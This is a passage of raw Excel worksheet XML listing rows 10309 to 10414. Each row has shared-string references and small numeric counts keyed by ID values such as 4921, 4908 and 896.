      <c r="D10309">
        <v>4921</v>
      </c>
    </row>
    <row r="10310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10310" t="s">
        <v>16231</v>
      </c>
      <c r="B10310" t="s">
        <v>16218</v>
      </c>
      <c r="C10310">
        <v>0</v>
      </c>
      <c r="D10310">
        <v>4921</v>
      </c>
    </row>
    <row r="10311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10311" t="s">
        <v>16229</v>
      </c>
      <c r="B10311" t="s">
        <v>16219</v>
      </c>
      <c r="C10311">
        <v>1</v>
      </c>
      <c r="D10311">
        <v>4921</v>
      </c>
    </row>
    <row r="10312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10312" t="s">
        <v>16230</v>
      </c>
      <c r="B10312" t="s">
        <v>16220</v>
      </c>
      <c r="C10312">
        <v>0</v>
      </c>
      <c r="D10312">
        <v>4921</v>
      </c>
    </row>
    <row r="10313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10313" t="s">
        <v>16229</v>
      </c>
      <c r="B10313" t="s">
        <v>16221</v>
      </c>
      <c r="C10313">
        <v>14</v>
      </c>
      <c r="D10313">
        <v>4921</v>
      </c>
    </row>
    <row r="10314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10314" t="s">
        <v>16230</v>
      </c>
      <c r="B10314" t="s">
        <v>16222</v>
      </c>
      <c r="C10314">
        <v>0</v>
      </c>
      <c r="D10314">
        <v>4921</v>
      </c>
    </row>
    <row r="10315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10315" t="s">
        <v>16223</v>
      </c>
      <c r="B10315" t="s">
        <v>16223</v>
      </c>
      <c r="C10315">
        <v>25</v>
      </c>
      <c r="D10315">
        <v>4921</v>
      </c>
    </row>
    <row r="10316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10316" t="s">
        <v>16224</v>
      </c>
      <c r="B10316" t="s">
        <v>16224</v>
      </c>
      <c r="C10316">
        <v>0</v>
      </c>
      <c r="D10316">
        <v>4921</v>
      </c>
    </row>
    <row r="10317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10317" t="s">
        <v>16228</v>
      </c>
      <c r="B10317" t="s">
        <v>16211</v>
      </c>
      <c r="C10317">
        <v>0</v>
      </c>
      <c r="D10317">
        <v>4908</v>
      </c>
    </row>
    <row r="10318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10318" t="s">
        <v>16231</v>
      </c>
      <c r="B10318" t="s">
        <v>16212</v>
      </c>
      <c r="C10318">
        <v>0</v>
      </c>
      <c r="D10318">
        <v>4908</v>
      </c>
    </row>
    <row r="10319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10319" t="s">
        <v>16228</v>
      </c>
      <c r="B10319" t="s">
        <v>16213</v>
      </c>
      <c r="C10319">
        <v>0</v>
      </c>
      <c r="D10319">
        <v>4908</v>
      </c>
    </row>
    <row r="10320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10320" t="s">
        <v>16231</v>
      </c>
      <c r="B10320" t="s">
        <v>16214</v>
      </c>
      <c r="C10320">
        <v>0</v>
      </c>
      <c r="D10320">
        <v>4908</v>
      </c>
    </row>
    <row r="10321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10321" t="s">
        <v>16228</v>
      </c>
      <c r="B10321" t="s">
        <v>16215</v>
      </c>
      <c r="C10321">
        <v>2</v>
      </c>
      <c r="D10321">
        <v>4908</v>
      </c>
    </row>
    <row r="10322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10322" t="s">
        <v>16231</v>
      </c>
      <c r="B10322" t="s">
        <v>16216</v>
      </c>
      <c r="C10322">
        <v>1</v>
      </c>
      <c r="D10322">
        <v>4908</v>
      </c>
    </row>
    <row r="10323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10323" t="s">
        <v>16228</v>
      </c>
      <c r="B10323" t="s">
        <v>16217</v>
      </c>
      <c r="C10323">
        <v>1</v>
      </c>
      <c r="D10323">
        <v>4908</v>
      </c>
    </row>
    <row r="10324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10324" t="s">
        <v>16231</v>
      </c>
      <c r="B10324" t="s">
        <v>16218</v>
      </c>
      <c r="C10324">
        <v>0</v>
      </c>
      <c r="D10324">
        <v>4908</v>
      </c>
    </row>
    <row r="10325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10325" t="s">
        <v>16229</v>
      </c>
      <c r="B10325" t="s">
        <v>16219</v>
      </c>
      <c r="C10325">
        <v>1</v>
      </c>
      <c r="D10325">
        <v>4908</v>
      </c>
    </row>
    <row r="10326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10326" t="s">
        <v>16230</v>
      </c>
      <c r="B10326" t="s">
        <v>16220</v>
      </c>
      <c r="C10326">
        <v>0</v>
      </c>
      <c r="D10326">
        <v>4908</v>
      </c>
    </row>
    <row r="10327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10327" t="s">
        <v>16229</v>
      </c>
      <c r="B10327" t="s">
        <v>16221</v>
      </c>
      <c r="C10327">
        <v>13</v>
      </c>
      <c r="D10327">
        <v>4908</v>
      </c>
    </row>
    <row r="10328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10328" t="s">
        <v>16230</v>
      </c>
      <c r="B10328" t="s">
        <v>16222</v>
      </c>
      <c r="C10328">
        <v>4</v>
      </c>
      <c r="D10328">
        <v>4908</v>
      </c>
    </row>
    <row r="10329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10329" t="s">
        <v>16223</v>
      </c>
      <c r="B10329" t="s">
        <v>16223</v>
      </c>
      <c r="C10329">
        <v>30</v>
      </c>
      <c r="D10329">
        <v>4908</v>
      </c>
    </row>
    <row r="10330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10330" t="s">
        <v>16224</v>
      </c>
      <c r="B10330" t="s">
        <v>16224</v>
      </c>
      <c r="C10330">
        <v>0</v>
      </c>
      <c r="D10330">
        <v>4908</v>
      </c>
    </row>
    <row r="10331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10331" t="s">
        <v>16228</v>
      </c>
      <c r="B10331" t="s">
        <v>16211</v>
      </c>
      <c r="C10331">
        <v>0</v>
      </c>
      <c r="D10331">
        <v>896</v>
      </c>
    </row>
    <row r="10332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10332" t="s">
        <v>16231</v>
      </c>
      <c r="B10332" t="s">
        <v>16212</v>
      </c>
      <c r="C10332">
        <v>0</v>
      </c>
      <c r="D10332">
        <v>896</v>
      </c>
    </row>
    <row r="10333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10333" t="s">
        <v>16228</v>
      </c>
      <c r="B10333" t="s">
        <v>16213</v>
      </c>
      <c r="C10333">
        <v>0</v>
      </c>
      <c r="D10333">
        <v>896</v>
      </c>
    </row>
    <row r="10334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10334" t="s">
        <v>16231</v>
      </c>
      <c r="B10334" t="s">
        <v>16214</v>
      </c>
      <c r="C10334">
        <v>0</v>
      </c>
      <c r="D10334">
        <v>896</v>
      </c>
    </row>
    <row r="10335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10335" t="s">
        <v>16228</v>
      </c>
      <c r="B10335" t="s">
        <v>16215</v>
      </c>
      <c r="C10335">
        <v>4</v>
      </c>
      <c r="D10335">
        <v>896</v>
      </c>
    </row>
    <row r="10336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10336" t="s">
        <v>16231</v>
      </c>
      <c r="B10336" t="s">
        <v>16216</v>
      </c>
      <c r="C10336">
        <v>6</v>
      </c>
      <c r="D10336">
        <v>896</v>
      </c>
    </row>
    <row r="10337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10337" t="s">
        <v>16228</v>
      </c>
      <c r="B10337" t="s">
        <v>16217</v>
      </c>
      <c r="C10337">
        <v>10</v>
      </c>
      <c r="D10337">
        <v>896</v>
      </c>
    </row>
    <row r="10338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10338" t="s">
        <v>16231</v>
      </c>
      <c r="B10338" t="s">
        <v>16218</v>
      </c>
      <c r="C10338">
        <v>28</v>
      </c>
      <c r="D10338">
        <v>896</v>
      </c>
    </row>
    <row r="10339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10339" t="s">
        <v>16229</v>
      </c>
      <c r="B10339" t="s">
        <v>16219</v>
      </c>
      <c r="C10339">
        <v>1</v>
      </c>
      <c r="D10339">
        <v>896</v>
      </c>
    </row>
    <row r="10340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10340" t="s">
        <v>16230</v>
      </c>
      <c r="B10340" t="s">
        <v>16220</v>
      </c>
      <c r="C10340">
        <v>2</v>
      </c>
      <c r="D10340">
        <v>896</v>
      </c>
    </row>
    <row r="10341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10341" t="s">
        <v>16229</v>
      </c>
      <c r="B10341" t="s">
        <v>16221</v>
      </c>
      <c r="C10341">
        <v>2</v>
      </c>
      <c r="D10341">
        <v>896</v>
      </c>
    </row>
    <row r="10342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10342" t="s">
        <v>16230</v>
      </c>
      <c r="B10342" t="s">
        <v>16222</v>
      </c>
      <c r="C10342">
        <v>165</v>
      </c>
      <c r="D10342">
        <v>896</v>
      </c>
    </row>
    <row r="10343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10343" t="s">
        <v>16223</v>
      </c>
      <c r="B10343" t="s">
        <v>16223</v>
      </c>
      <c r="C10343">
        <v>312</v>
      </c>
      <c r="D10343">
        <v>896</v>
      </c>
    </row>
    <row r="10344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10344" t="s">
        <v>16224</v>
      </c>
      <c r="B10344" t="s">
        <v>16224</v>
      </c>
      <c r="C10344">
        <v>1</v>
      </c>
      <c r="D10344">
        <v>896</v>
      </c>
    </row>
    <row r="10345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10345" t="s">
        <v>16228</v>
      </c>
      <c r="B10345" t="s">
        <v>16211</v>
      </c>
      <c r="C10345">
        <v>0</v>
      </c>
      <c r="D10345">
        <v>4805</v>
      </c>
    </row>
    <row r="10346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10346" t="s">
        <v>16231</v>
      </c>
      <c r="B10346" t="s">
        <v>16212</v>
      </c>
      <c r="C10346">
        <v>0</v>
      </c>
      <c r="D10346">
        <v>4805</v>
      </c>
    </row>
    <row r="10347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10347" t="s">
        <v>16228</v>
      </c>
      <c r="B10347" t="s">
        <v>16213</v>
      </c>
      <c r="C10347">
        <v>0</v>
      </c>
      <c r="D10347">
        <v>4805</v>
      </c>
    </row>
    <row r="10348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10348" t="s">
        <v>16231</v>
      </c>
      <c r="B10348" t="s">
        <v>16214</v>
      </c>
      <c r="C10348">
        <v>0</v>
      </c>
      <c r="D10348">
        <v>4805</v>
      </c>
    </row>
    <row r="10349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10349" t="s">
        <v>16228</v>
      </c>
      <c r="B10349" t="s">
        <v>16215</v>
      </c>
      <c r="C10349">
        <v>2</v>
      </c>
      <c r="D10349">
        <v>4805</v>
      </c>
    </row>
    <row r="10350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10350" t="s">
        <v>16231</v>
      </c>
      <c r="B10350" t="s">
        <v>16216</v>
      </c>
      <c r="C10350">
        <v>2</v>
      </c>
      <c r="D10350">
        <v>4805</v>
      </c>
    </row>
    <row r="10351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10351" t="s">
        <v>16228</v>
      </c>
      <c r="B10351" t="s">
        <v>16217</v>
      </c>
      <c r="C10351">
        <v>0</v>
      </c>
      <c r="D10351">
        <v>4805</v>
      </c>
    </row>
    <row r="10352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10352" t="s">
        <v>16231</v>
      </c>
      <c r="B10352" t="s">
        <v>16218</v>
      </c>
      <c r="C10352">
        <v>10</v>
      </c>
      <c r="D10352">
        <v>4805</v>
      </c>
    </row>
    <row r="10353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10353" t="s">
        <v>16229</v>
      </c>
      <c r="B10353" t="s">
        <v>16219</v>
      </c>
      <c r="C10353">
        <v>0</v>
      </c>
      <c r="D10353">
        <v>4805</v>
      </c>
    </row>
    <row r="10354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10354" t="s">
        <v>16230</v>
      </c>
      <c r="B10354" t="s">
        <v>16220</v>
      </c>
      <c r="C10354">
        <v>0</v>
      </c>
      <c r="D10354">
        <v>4805</v>
      </c>
    </row>
    <row r="10355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10355" t="s">
        <v>16229</v>
      </c>
      <c r="B10355" t="s">
        <v>16221</v>
      </c>
      <c r="C10355">
        <v>0</v>
      </c>
      <c r="D10355">
        <v>4805</v>
      </c>
    </row>
    <row r="10356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10356" t="s">
        <v>16230</v>
      </c>
      <c r="B10356" t="s">
        <v>16222</v>
      </c>
      <c r="C10356">
        <v>0</v>
      </c>
      <c r="D10356">
        <v>4805</v>
      </c>
    </row>
    <row r="10357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10357" t="s">
        <v>16223</v>
      </c>
      <c r="B10357" t="s">
        <v>16223</v>
      </c>
      <c r="C10357">
        <v>25</v>
      </c>
      <c r="D10357">
        <v>4805</v>
      </c>
    </row>
    <row r="10358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10358" t="s">
        <v>16224</v>
      </c>
      <c r="B10358" t="s">
        <v>16224</v>
      </c>
      <c r="C10358">
        <v>1</v>
      </c>
      <c r="D10358">
        <v>4805</v>
      </c>
    </row>
    <row r="10359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10359" t="s">
        <v>16228</v>
      </c>
      <c r="B10359" t="s">
        <v>16211</v>
      </c>
      <c r="C10359">
        <v>0</v>
      </c>
      <c r="D10359">
        <v>713</v>
      </c>
    </row>
    <row r="10360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10360" t="s">
        <v>16231</v>
      </c>
      <c r="B10360" t="s">
        <v>16212</v>
      </c>
      <c r="C10360">
        <v>0</v>
      </c>
      <c r="D10360">
        <v>713</v>
      </c>
    </row>
    <row r="10361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10361" t="s">
        <v>16228</v>
      </c>
      <c r="B10361" t="s">
        <v>16213</v>
      </c>
      <c r="C10361">
        <v>0</v>
      </c>
      <c r="D10361">
        <v>713</v>
      </c>
    </row>
    <row r="10362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10362" t="s">
        <v>16231</v>
      </c>
      <c r="B10362" t="s">
        <v>16214</v>
      </c>
      <c r="C10362">
        <v>0</v>
      </c>
      <c r="D10362">
        <v>713</v>
      </c>
    </row>
    <row r="10363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10363" t="s">
        <v>16228</v>
      </c>
      <c r="B10363" t="s">
        <v>16215</v>
      </c>
      <c r="C10363">
        <v>1</v>
      </c>
      <c r="D10363">
        <v>713</v>
      </c>
    </row>
    <row r="10364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10364" t="s">
        <v>16231</v>
      </c>
      <c r="B10364" t="s">
        <v>16216</v>
      </c>
      <c r="C10364">
        <v>0</v>
      </c>
      <c r="D10364">
        <v>713</v>
      </c>
    </row>
    <row r="10365" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10365" t="s">
        <v>16228</v>
      </c>
      <c r="B10365" t="s">
        <v>16217</v>
      </c>
      <c r="C10365">
        <v>0</v>
      </c>
      <c r="D10365">
        <v>713</v>
      </c>
    </row>
    <row r="10366" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10366" t="s">
        <v>16231</v>
      </c>
      <c r="B10366" t="s">
        <v>16218</v>
      </c>
      <c r="C10366">
        <v>0</v>
      </c>
      <c r="D10366">
        <v>713</v>
      </c>
    </row>
    <row r="10367" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10367" t="s">
        <v>16229</v>
      </c>
      <c r="B10367" t="s">
        <v>16219</v>
      </c>
      <c r="C10367">
        <v>0</v>
      </c>
      <c r="D10367">
        <v>713</v>
      </c>
    </row>
    <row r="10368" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10368" t="s">
        <v>16230</v>
      </c>
      <c r="B10368" t="s">
        <v>16220</v>
      </c>
      <c r="C10368">
        <v>0</v>
      </c>
      <c r="D10368">
        <v>713</v>
      </c>
    </row>
    <row r="10369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10369" t="s">
        <v>16229</v>
      </c>
      <c r="B10369" t="s">
        <v>16221</v>
      </c>
      <c r="C10369">
        <v>0</v>
      </c>
      <c r="D10369">
        <v>713</v>
      </c>
    </row>
    <row r="10370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10370" t="s">
        <v>16230</v>
      </c>
      <c r="B10370" t="s">
        <v>16222</v>
      </c>
      <c r="C10370">
        <v>10</v>
      </c>
      <c r="D10370">
        <v>713</v>
      </c>
    </row>
    <row r="10371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10371" t="s">
        <v>16223</v>
      </c>
      <c r="B10371" t="s">
        <v>16223</v>
      </c>
      <c r="C10371">
        <v>25</v>
      </c>
      <c r="D10371">
        <v>713</v>
      </c>
    </row>
    <row r="10372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10372" t="s">
        <v>16224</v>
      </c>
      <c r="B10372" t="s">
        <v>16224</v>
      </c>
      <c r="C10372">
        <v>1</v>
      </c>
      <c r="D10372">
        <v>713</v>
      </c>
    </row>
    <row r="10373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10373" t="s">
        <v>16228</v>
      </c>
      <c r="B10373" t="s">
        <v>16211</v>
      </c>
      <c r="C10373">
        <v>0</v>
      </c>
      <c r="D10373">
        <v>4909</v>
      </c>
    </row>
    <row r="10374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10374" t="s">
        <v>16231</v>
      </c>
      <c r="B10374" t="s">
        <v>16212</v>
      </c>
      <c r="C10374">
        <v>0</v>
      </c>
      <c r="D10374">
        <v>4909</v>
      </c>
    </row>
    <row r="10375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10375" t="s">
        <v>16228</v>
      </c>
      <c r="B10375" t="s">
        <v>16213</v>
      </c>
      <c r="C10375">
        <v>0</v>
      </c>
      <c r="D10375">
        <v>4909</v>
      </c>
    </row>
    <row r="10376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10376" t="s">
        <v>16231</v>
      </c>
      <c r="B10376" t="s">
        <v>16214</v>
      </c>
      <c r="C10376">
        <v>0</v>
      </c>
      <c r="D10376">
        <v>4909</v>
      </c>
    </row>
    <row r="10377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10377" t="s">
        <v>16228</v>
      </c>
      <c r="B10377" t="s">
        <v>16215</v>
      </c>
      <c r="C10377">
        <v>3</v>
      </c>
      <c r="D10377">
        <v>4909</v>
      </c>
    </row>
    <row r="10378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10378" t="s">
        <v>16231</v>
      </c>
      <c r="B10378" t="s">
        <v>16216</v>
      </c>
      <c r="C10378">
        <v>0</v>
      </c>
      <c r="D10378">
        <v>4909</v>
      </c>
    </row>
    <row r="10379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10379" t="s">
        <v>16228</v>
      </c>
      <c r="B10379" t="s">
        <v>16217</v>
      </c>
      <c r="C10379">
        <v>0</v>
      </c>
      <c r="D10379">
        <v>4909</v>
      </c>
    </row>
    <row r="10380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10380" t="s">
        <v>16231</v>
      </c>
      <c r="B10380" t="s">
        <v>16218</v>
      </c>
      <c r="C10380">
        <v>0</v>
      </c>
      <c r="D10380">
        <v>4909</v>
      </c>
    </row>
    <row r="10381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10381" t="s">
        <v>16229</v>
      </c>
      <c r="B10381" t="s">
        <v>16219</v>
      </c>
      <c r="C10381">
        <v>0</v>
      </c>
      <c r="D10381">
        <v>4909</v>
      </c>
    </row>
    <row r="10382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10382" t="s">
        <v>16230</v>
      </c>
      <c r="B10382" t="s">
        <v>16220</v>
      </c>
      <c r="C10382">
        <v>0</v>
      </c>
      <c r="D10382">
        <v>4909</v>
      </c>
    </row>
    <row r="10383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10383" t="s">
        <v>16229</v>
      </c>
      <c r="B10383" t="s">
        <v>16221</v>
      </c>
      <c r="C10383">
        <v>0</v>
      </c>
      <c r="D10383">
        <v>4909</v>
      </c>
    </row>
    <row r="10384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10384" t="s">
        <v>16230</v>
      </c>
      <c r="B10384" t="s">
        <v>16222</v>
      </c>
      <c r="C10384">
        <v>0</v>
      </c>
      <c r="D10384">
        <v>4909</v>
      </c>
    </row>
    <row r="10385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10385" t="s">
        <v>16223</v>
      </c>
      <c r="B10385" t="s">
        <v>16223</v>
      </c>
      <c r="C10385">
        <v>25</v>
      </c>
      <c r="D10385">
        <v>4909</v>
      </c>
    </row>
    <row r="10386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10386" t="s">
        <v>16224</v>
      </c>
      <c r="B10386" t="s">
        <v>16224</v>
      </c>
      <c r="C10386">
        <v>0</v>
      </c>
      <c r="D10386">
        <v>4909</v>
      </c>
    </row>
    <row r="10387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10387" t="s">
        <v>16228</v>
      </c>
      <c r="B10387" t="s">
        <v>16211</v>
      </c>
      <c r="C10387">
        <v>0</v>
      </c>
      <c r="D10387">
        <v>195</v>
      </c>
    </row>
    <row r="10388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10388" t="s">
        <v>16231</v>
      </c>
      <c r="B10388" t="s">
        <v>16212</v>
      </c>
      <c r="C10388">
        <v>0</v>
      </c>
      <c r="D10388">
        <v>195</v>
      </c>
    </row>
    <row r="10389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10389" t="s">
        <v>16228</v>
      </c>
      <c r="B10389" t="s">
        <v>16213</v>
      </c>
      <c r="C10389">
        <v>0</v>
      </c>
      <c r="D10389">
        <v>195</v>
      </c>
    </row>
    <row r="10390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10390" t="s">
        <v>16231</v>
      </c>
      <c r="B10390" t="s">
        <v>16214</v>
      </c>
      <c r="C10390">
        <v>0</v>
      </c>
      <c r="D10390">
        <v>195</v>
      </c>
    </row>
    <row r="10391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10391" t="s">
        <v>16228</v>
      </c>
      <c r="B10391" t="s">
        <v>16215</v>
      </c>
      <c r="C10391">
        <v>1</v>
      </c>
      <c r="D10391">
        <v>195</v>
      </c>
    </row>
    <row r="10392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10392" t="s">
        <v>16231</v>
      </c>
      <c r="B10392" t="s">
        <v>16216</v>
      </c>
      <c r="C10392">
        <v>1</v>
      </c>
      <c r="D10392">
        <v>195</v>
      </c>
    </row>
    <row r="10393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10393" t="s">
        <v>16228</v>
      </c>
      <c r="B10393" t="s">
        <v>16217</v>
      </c>
      <c r="C10393">
        <v>12</v>
      </c>
      <c r="D10393">
        <v>195</v>
      </c>
    </row>
    <row r="10394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10394" t="s">
        <v>16231</v>
      </c>
      <c r="B10394" t="s">
        <v>16218</v>
      </c>
      <c r="C10394">
        <v>0</v>
      </c>
      <c r="D10394">
        <v>195</v>
      </c>
    </row>
    <row r="10395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10395" t="s">
        <v>16229</v>
      </c>
      <c r="B10395" t="s">
        <v>16219</v>
      </c>
      <c r="C10395">
        <v>0</v>
      </c>
      <c r="D10395">
        <v>195</v>
      </c>
    </row>
    <row r="10396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10396" t="s">
        <v>16230</v>
      </c>
      <c r="B10396" t="s">
        <v>16220</v>
      </c>
      <c r="C10396">
        <v>0</v>
      </c>
      <c r="D10396">
        <v>195</v>
      </c>
    </row>
    <row r="10397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10397" t="s">
        <v>16229</v>
      </c>
      <c r="B10397" t="s">
        <v>16221</v>
      </c>
      <c r="C10397">
        <v>0</v>
      </c>
      <c r="D10397">
        <v>195</v>
      </c>
    </row>
    <row r="10398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10398" t="s">
        <v>16230</v>
      </c>
      <c r="B10398" t="s">
        <v>16222</v>
      </c>
      <c r="C10398">
        <v>0</v>
      </c>
      <c r="D10398">
        <v>195</v>
      </c>
    </row>
    <row r="10399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10399" t="s">
        <v>16223</v>
      </c>
      <c r="B10399" t="s">
        <v>16223</v>
      </c>
      <c r="C10399">
        <v>7</v>
      </c>
      <c r="D10399">
        <v>195</v>
      </c>
    </row>
    <row r="10400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10400" t="s">
        <v>16224</v>
      </c>
      <c r="B10400" t="s">
        <v>16224</v>
      </c>
      <c r="C10400">
        <v>0</v>
      </c>
      <c r="D10400">
        <v>195</v>
      </c>
    </row>
    <row r="10401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10401" t="s">
        <v>16228</v>
      </c>
      <c r="B10401" t="s">
        <v>16211</v>
      </c>
      <c r="C10401">
        <v>0</v>
      </c>
      <c r="D10401">
        <v>4911</v>
      </c>
    </row>
    <row r="10402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10402" t="s">
        <v>16231</v>
      </c>
      <c r="B10402" t="s">
        <v>16212</v>
      </c>
      <c r="C10402">
        <v>0</v>
      </c>
      <c r="D10402">
        <v>4911</v>
      </c>
    </row>
    <row r="10403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10403" t="s">
        <v>16228</v>
      </c>
      <c r="B10403" t="s">
        <v>16213</v>
      </c>
      <c r="C10403">
        <v>0</v>
      </c>
      <c r="D10403">
        <v>4911</v>
      </c>
    </row>
    <row r="10404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10404" t="s">
        <v>16231</v>
      </c>
      <c r="B10404" t="s">
        <v>16214</v>
      </c>
      <c r="C10404">
        <v>0</v>
      </c>
      <c r="D10404">
        <v>4911</v>
      </c>
    </row>
    <row r="10405" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10405" t="s">
        <v>16228</v>
      </c>
      <c r="B10405" t="s">
        <v>16215</v>
      </c>
      <c r="C10405">
        <v>11</v>
      </c>
      <c r="D10405">
        <v>4911</v>
      </c>
    </row>
    <row r="10406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10406" t="s">
        <v>16231</v>
      </c>
      <c r="B10406" t="s">
        <v>16216</v>
      </c>
      <c r="C10406">
        <v>3</v>
      </c>
      <c r="D10406">
        <v>4911</v>
      </c>
    </row>
    <row r="10407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10407" t="s">
        <v>16228</v>
      </c>
      <c r="B10407" t="s">
        <v>16217</v>
      </c>
      <c r="C10407">
        <v>0</v>
      </c>
      <c r="D10407">
        <v>4911</v>
      </c>
    </row>
    <row r="10408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10408" t="s">
        <v>16231</v>
      </c>
      <c r="B10408" t="s">
        <v>16218</v>
      </c>
      <c r="C10408">
        <v>0</v>
      </c>
      <c r="D10408">
        <v>4911</v>
      </c>
    </row>
    <row r="10409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10409" t="s">
        <v>16229</v>
      </c>
      <c r="B10409" t="s">
        <v>16219</v>
      </c>
      <c r="C10409">
        <v>0</v>
      </c>
      <c r="D10409">
        <v>4911</v>
      </c>
    </row>
    <row r="10410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10410" t="s">
        <v>16230</v>
      </c>
      <c r="B10410" t="s">
        <v>16220</v>
      </c>
      <c r="C10410">
        <v>0</v>
      </c>
      <c r="D10410">
        <v>4911</v>
      </c>
    </row>
    <row r="10411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10411" t="s">
        <v>16229</v>
      </c>
      <c r="B10411" t="s">
        <v>16221</v>
      </c>
      <c r="C10411">
        <v>0</v>
      </c>
      <c r="D10411">
        <v>4911</v>
      </c>
    </row>
    <row r="10412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10412" t="s">
        <v>16230</v>
      </c>
      <c r="B10412" t="s">
        <v>16222</v>
      </c>
      <c r="C10412">
        <v>0</v>
      </c>
      <c r="D10412">
        <v>4911</v>
      </c>
    </row>
    <row r="10413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10413" t="s">
        <v>16223</v>
      </c>
      <c r="B10413" t="s">
        <v>16223</v>
      </c>
      <c r="C10413">
        <v>28</v>
      </c>
      <c r="D10413">
        <v>4911</v>
      </c>
    </row>
    <row r="10414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10414" t="s">
        <v>16224</v>
      </c>
      <c r="B10414" t="s">
        <v>16224</v>
      </c>
      <c r="C10414">
        <v>1</v>
      </c>
      <c r="D10414">
        <v>4911</v>
      </c>
